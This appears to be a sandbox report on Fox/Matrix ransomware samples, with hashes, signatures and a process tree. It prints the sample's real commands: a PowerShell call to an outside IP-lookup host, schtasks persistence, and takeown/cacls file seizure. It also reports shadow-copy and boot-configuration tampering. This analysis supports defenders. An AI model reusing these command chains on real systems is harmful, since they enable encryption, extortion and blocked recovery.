Overview
Analysis
max time kernel: 150s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 13-02-2024 05:15
Static task static1
Behavioral task behavioral1: Sample FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe, Resource win7-20231215-en
Behavioral task behavioral2: Sample FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe, Resource win10v2004-20231215-en
Behavioral task behavioral3: Sample FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe, Resource win7-20231215-en
Behavioral task behavioral4: Sample FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe, Resource win10v2004-20231215-en
Behavioral task behavioral5: Sample FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe, Resource win7-20231215-en
Behavioral task behavioral6: Sample FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe, Resource win10v2004-20231215-en
Behavioral task behavioral7: Sample FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe, Resource win7-20231215-en
Behavioral task behavioral8: Sample FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe, Resource win10v2004-20231215-en
Behavioral task behavioral9: Sample FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe, Resource win7-20231215-en
Behavioral task behavioral10: Sample FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe, Resource win10v2004-20231222-en
Behavioral task behavioral11: Sample FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe, Resource win7-20231215-en
Behavioral task behavioral12: Sample FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe, Resource win10v2004-20231215-en
General
Target: FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Size: 1.2MB
MD5: 268360527625d09e747d9f7ab1f84da5
SHA1: 09772eb89c9743d3a6d7b2709c76e9740aa4c4b1
SHA256: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
SHA512: 07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
SSDEEP: 24576:mLeb4QFvTn5TuJR5ezGPMy4EnBB/CPVd+5M89H:Xb/GMO6d+5M+H
Malware Config
Extracted:
http://myexternalip.com/raw
Extracted (from C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\#FOX_README#.rtf):
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
Matrix Ransomware (64 IoCs)
Targeted ransomware with information collection and encryption functionality.
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.
Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
pid / Process: 6292 bcdedit.exe; 5276 bcdedit.exe
Blocklisted process makes network request (1 IoCs)
flow 159, pid 3132, Process powershell.exe
Drops file in Drivers directory (1 IoCs)
File created: C:\Windows\system32\Drivers\PROCEXP152.SYS (Process fjPLyeD864.exe)
Sets service image path in registry (2 TTPs, 1 IoCs)
Set value (str): \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" (Process fjPLyeD864.exe)
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
Key value queried: \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation (Process wscript.exe)
Executes dropped EXE (64 IoCs)
Modifies file permissions (1 TTPs, 64 IoCs)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
yara_rule upx: matched on behavioral6 dropped files and memory dumps
Drops desktop.ini file(s) (27 IoCs)
Enumerates connected drives (3 TTPs, 44 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow 158, ioc myexternalip.com
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Set value (str): \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\7mnQbxzr.bmp" (Process DllHost.exe)
Drops file in Program Files directory (64 IoCs)
description  ioc  (Process for every row: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe)
File created  C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64\#FOX_README#.rtf
File opened for modification  C:\Program Files\Java\jre-1.8\legal\jdk\cryptix.md
File opened for modification  C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\vlc.mo
File opened for modification  C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac
File created  C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#FOX_README#.rtf
File opened for modification  C:\Program Files\DebugRegister.ttf
File opened for modification  C:\Program Files\Java\jre-1.8\legal\jdk\relaxngom.md
File opened for modification  C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo
File created  C:\Program Files\Java\jre-1.8\lib\images\cursors\#FOX_README#.rtf
File opened for modification  C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac
File opened for modification  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Advertising
File opened for modification  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\CompatExceptions.DATA
File created  C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#FOX_README#.rtf
File opened for modification  C:\Program Files\Java\jdk-1.8\jre\lib\ext\sunpkcs11.jar
File opened for modification  C:\Program Files\Java\jre-1.8\legal\jdk\unicode.md
File opened for modification  C:\Program Files\Mozilla Firefox\browser\features\[email protected]
File opened for modification  C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe
File opened for modification  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ar.pak.DATA
File opened for modification  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\vi.pak.DATA
File opened for modification  C:\Program Files\Java\jdk-1.8\release
File opened for modification  C:\Program Files\Java\jdk-1.8\legal\jdk\libpng.md
File opened for modification  C:\Program Files\Java\jre-1.8\lib\plugin.jar
File created  C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\#FOX_README#.rtf
File opened for modification  C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jcup.md
File opened for modification  C:\Program Files\VideoLAN\VLC\Documentation.url
File opened for modification  C:\Program Files\VideoLAN\VLC\COPYING.txt
File opened for modification  C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo
File opened for modification  C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png
File opened for modification  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\msedge_7z.data
File opened for modification  C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo
File opened for modification  C:\Program Files\ExpandRegister.MTS
File opened for modification  C:\Program Files\Java\jdk-1.8\jre\legal\javafx\webkit.md
File opened for modification  C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
File opened for modification  C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json
File opened for modification  C:\Program Files\Java\jdk-1.8\jre\legal\javafx\mesa3d.md
File opened for modification  C:\Program Files\Java\jre-1.8\bin\server\classes.jsa
File opened for modification  C:\Program Files\Java\jre-1.8\bin\orbd.exe
File created  C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#FOX_README#.rtf
File opened for modification  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\zh-TW.pak
File opened for modification  C:\Program Files\Java\jdk-1.8\bin\java.exe
File created  C:\Program Files\Java\jdk-1.8\include\#FOX_README#.rtf
File opened for modification  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\te.pak.DATA
File opened for modification  C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.181.5\MicrosoftEdgeUpdateOnDemand.exe
File opened for modification  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\Advertising.DATA
File created  C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#FOX_README#.rtf
File opened for modification  C:\Program Files\Java\jdk-1.8\jre\lib\ext\access-bridge-64.jar
File opened for modification  C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\invalid32x32.gif
File opened for modification  C:\Program Files\Mozilla Firefox\maintenanceservice.exe
File opened for modification  C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo
File opened for modification  C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png
File created  C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#FOX_README#.rtf
File opened for modification  C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_ko.properties
File created  C:\Program Files\Java\jdk-1.8\jre\lib\deploy\#FOX_README#.rtf
File opened for modification  C:\Program Files\Java\jre-1.8\lib\security\cacerts
File opened for modification  C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png
File opened for modification  C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\en-US.pak
File opened for modification  C:\Program Files\Java\jdk-1.8\jre\lib\deploy\splash.gif
File opened for modification  C:\Program Files\Mozilla Firefox\crashreporter.exe
File created  C:\Program Files\Java\jdk-1.8\jre\lib\management\#FOX_README#.rtf
File opened for modification  C:\Program Files\VideoLAN\VLC\NEWS.txt
File opened for modification  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\hi.pak.DATA
File created  C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#FOX_README#.rtf
File opened for modification  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Sigma\Other.DATA
File created  C:\Program Files\#FOX_README#.rtf
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5844 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1304 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid  Process
3132  powershell.exe (3 entries)
6196  fjPLyeD864.exe (9 entries)
-
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 6196 fjPLyeD864.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description  pid  Process
Token: SeDebugPrivilege  3132  powershell.exe
Token: SeTakeOwnershipPrivilege  660  takeown.exe
Token: SeDebugPrivilege  6196  fjPLyeD864.exe
Token: SeLoadDriverPrivilege  6196  fjPLyeD864.exe
Token: SeTakeOwnershipPrivilege  3460  takeown.exe
Token: SeTakeOwnershipPrivilege  7128  takeown.exe
Token: SeTakeOwnershipPrivilege  2908  takeown.exe
Token: SeTakeOwnershipPrivilege  7136  takeown.exe
Token: SeTakeOwnershipPrivilege  5324  takeown.exe
Token: SeBackupPrivilege  6340  vssvc.exe
Token: SeRestorePrivilege  6340  vssvc.exe
Token: SeAuditPrivilege  6340  vssvc.exe
Token: SeTakeOwnershipPrivilege  5256  cacls.exe
Token (21 entries, first pass)  4584  WMIC.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (the last four are privilege LUIDs the sandbox did not resolve to names)
Token: SeTakeOwnershipPrivilege  7568  cmd.exe
Token (21 entries, second pass)  4584  WMIC.exe: the same 21 privileges as the first pass, in the same order
Token: SeTakeOwnershipPrivilege  6856  takeown.exe
Token: SeTakeOwnershipPrivilege  8096  takeown.exe
Token: SeTakeOwnershipPrivilege  6768  takeown.exe
Token: SeTakeOwnershipPrivilege  7644  cmd.exe
Token: SeTakeOwnershipPrivilege  6164  cmd.exe
Token: SeTakeOwnershipPrivilege  8100  takeown.exe
Token: SeTakeOwnershipPrivilege  7812  takeown.exe
Token: SeTakeOwnershipPrivilege  8068  takeown.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
description  pid  Process  procid_target
(PID 5040 is the sample, 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe; each row was logged the number of times shown.)
PID 5040 wrote to memory of 1560  (procid_target 85), 3 times
PID 5040 wrote to memory of 2968  (87), 3 times
PID 5040 wrote to memory of 1300  (92), 3 times
PID 1300 cmd.exe wrote to memory of 3132  (94), 3 times
PID 5040 wrote to memory of 3532  (99), 3 times
PID 5040 wrote to memory of 1516  (100), 3 times
PID 3532 cmd.exe wrote to memory of 4236  (109), 3 times
PID 1516 cmd.exe wrote to memory of 3020  (104), 3 times
PID 5040 wrote to memory of 2536  (105), 3 times
PID 3532 cmd.exe wrote to memory of 3288  (107), 3 times
PID 3532 cmd.exe wrote to memory of 392  (108), 3 times
PID 2536 cmd.exe wrote to memory of 3728  (110), 3 times
PID 2536 cmd.exe wrote to memory of 660  (111), 3 times
PID 2536 cmd.exe wrote to memory of 7968  (113), 3 times
PID 7968 cmd.exe wrote to memory of 8000  (112), 3 times
PID 8000 fjPLyeD8.exe wrote to memory of 6196  (114), 2 times
PID 5040 wrote to memory of 6548  (115), 3 times
PID 6548 cmd.exe wrote to memory of 5996  (117), 3 times
PID 6548 cmd.exe wrote to memory of 896  (118), 3 times
PID 6548 cmd.exe wrote to memory of 6588  (119), 3 times
PID 6588 cmd.exe wrote to memory of 6776  (120), 3 times
PID 6548 cmd.exe wrote to memory of 6704  (121), 2 times (the listing stops at 64 entries)
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe"1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW76nE8i.exe"2⤵PID:1560
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW76nE8i.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW76nE8i.exe" -n2⤵
- Executes dropped EXE
PID:2968
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3TnjE0Fu.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3132
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7mnQbxzr.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7mnQbxzr.bmp" /f3⤵PID:4236
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:3288
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:392
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\CxstsUWG.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\CxstsUWG.vbs"3⤵
- Checks computer location settings
PID:3020 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\nFhwKFc9.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵PID:6852
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\nFhwKFc9.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:5844
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:7664
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:5820
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:3728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:7968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db""2⤵
- Suspicious use of WriteProcessMemory
PID:6548 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db" /E /G Admin:F /C3⤵PID:5996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db"3⤵PID:896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "ActivitiesCache.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:6588 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "ActivitiesCache.db" -nobanner4⤵
- Executes dropped EXE
PID:6776
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:6704
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db""2⤵PID:7048
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G Admin:F /C3⤵PID:6828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "SmsInterceptStore.db" -nobanner3⤵PID:1388
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "SmsInterceptStore.db" -nobanner4⤵
- Executes dropped EXE
PID:7544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵PID:7176
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:7860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵PID:6968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "store.db" -nobanner3⤵PID:7308
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
PID:7608
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:7476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa""2⤵PID:7456
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:8132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa"3⤵PID:8148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "classes.jsa" -nobanner3⤵PID:5764
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "classes.jsa" -nobanner4⤵PID:2196
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5704
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa""2⤵PID:3940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:7532
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre-1.8\bin\server\classes.jsa"3⤵PID:8184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "classes.jsa" -nobanner3⤵PID:5876
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:5228
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2068
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner3⤵
- Executes dropped EXE
PID:5900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml""2⤵PID:6948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml" /E /G Admin:F /C3⤵PID:6284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "AssemblyList_4_client.xml" -nobanner3⤵PID:7496
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "AssemblyList_4_client.xml" -nobanner4⤵
- Executes dropped EXE
PID:7820
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:6092
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:6004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "behavior.xml" -nobanner3⤵PID:2780
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "behavior.xml" -nobanner4⤵
- Executes dropped EXE
PID:5268
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2924
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:6312
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:6224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:7136
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:7096
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml""2⤵PID:6252
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml" /E /G Admin:F /C3⤵PID:6544
-
-
